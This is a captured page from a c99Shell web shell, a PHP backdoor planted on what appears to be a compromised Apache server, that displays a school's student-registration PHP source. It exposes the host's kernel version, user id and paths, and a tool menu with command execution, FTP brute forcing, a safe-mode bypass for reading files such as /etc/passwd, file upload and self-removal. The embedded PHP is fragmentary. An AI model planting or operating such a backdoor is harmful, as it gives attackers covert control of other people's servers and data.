!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/Std_Acc_depart/   drwxr-xr-x
Free 52.61 GB of 127.8 GB (41.17%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     InsertStudent.php (6.06 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
0)
{
$msg .="
  • รหัสนักศึกษารหัส $Student_id มีในฐานข้อมูลแล้ว";
$button ="";
$Flag = false;
}
////////////////////////// check First name 
if ($First_name =="")
{
$msg .="
  • กรุณาระบุ คำนำหน้า";
$button ="";
$Flag = false;
}
///////////////////// check name
if ($Name =="")
{
$msg .="
  • กรุณาระบุ ชื่อ";
$button ="";
$Flag = false;
}
/////////////////// Check Lastname
if ($Lastname =="")
{
$msg .="
  • กรุณาระบุ นามสกุล";
$button ="";
$Flag = false;
}
////////////////////////// check First name 
if ($Sex =="")
{
$msg .="
  • กรุณาระบุ เพศ";
$button ="";
$Flag = false;
}
////////////////////////
/*if ( ! CheckLenght($Student_id,7))
	{
		$msg .= "
  • รหัสนักศึกษาต้องมีตั้งแต่ 7 หลัก";
		$button = "";
		$Flag = false;
	}*/
///////////////////////  Check Address
if ($Address=="")
{
$msg .="
  • กรุณาระบุ ภูมิลำเนา";
$button ="";
$Flag = false;
}

///////////////////////// Check Status to Insert Data /////////////////////////////

   if( $Flag)
	{
	   $Path = "../Std_pic"; 
	if ( isset($Img1) )
	if (copy($Img1,"$Path/$Img1_name")) 
       {
		    unlink ($Img1);
            $Img1 = "$Path/$Img1_name";
	     }
		else
			echo"Can't Copy";
	  
       InsertStudent($Course_code,$ProvincdId,$Class,$Orderlist,$Student_id,$First_name,$Name,$Lastname,$Sex,$DateBirth,$Religion,$Address,$Img1,$Father_name,$Mother_name,$Address2,$Telno,$Pre_inst,$Pre_gpa,$Select_Method,$Term,$Date_in,$Institute,$Teacher_code,$Affect_class,$Scholarship_code,$Address_cur,$Coll_in,$Coll_out,$Circle_duty,$Circle,$Succ_Status) ;
		  $msg.="
  • $Student_id$Name $Lastname";
          $msg.="
  • ระบบจัดเก็บข้อมูลเรียบร้อยแล้ว";
        echo"\n";
	  
     }
	CloseDB();
?>


Student





    

    
  
    
    
    
      
    ::แบบฟอร์มกรอกข้อมูลนักศึกษา::
    		

    

    


    
          
    
            ระบบแจ้งการทำงาน

    

    
             
              
    

    


    

    
    		

    

    
             
              
            
    		

    

    
    		

    

    
  
    

    


";
	 echo"\n";
     echo"
    ";
	  echo"


    Please Login 
    ";
      echo"

     ERROR 404 PERMISION DENY
    ";
	  echo"
     คุณไม่มสิทธ์ใช้งาน";
	  echo"
    ";
	  echo"";
} 
?>
    bool(false)

    • :: Command execute ::

    Enter:
     
    Select:
     

    :: Shadow's tricks :D ::

    Useful Commands
     
    Warning. Kernel may be alerted using higher levels
    Kernel Info:

    :: Preddy's tricks :D ::

    Php Safe-Mode Bypass (Read Files)

    File:

    eg: /etc/passwd
    Php Safe-Mode Bypass (List Directories):

    Dir:

    eg: /etc/

    :: Search ::
      - regexp 
    :: Upload ::
     
    [ ok ]

    :: Make Dir ::
     
    [ ok ]
    :: Make File ::
     
    [ ok ]

    :: Go Dir ::
     
    :: Go File ::
     

    --[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0054 ]--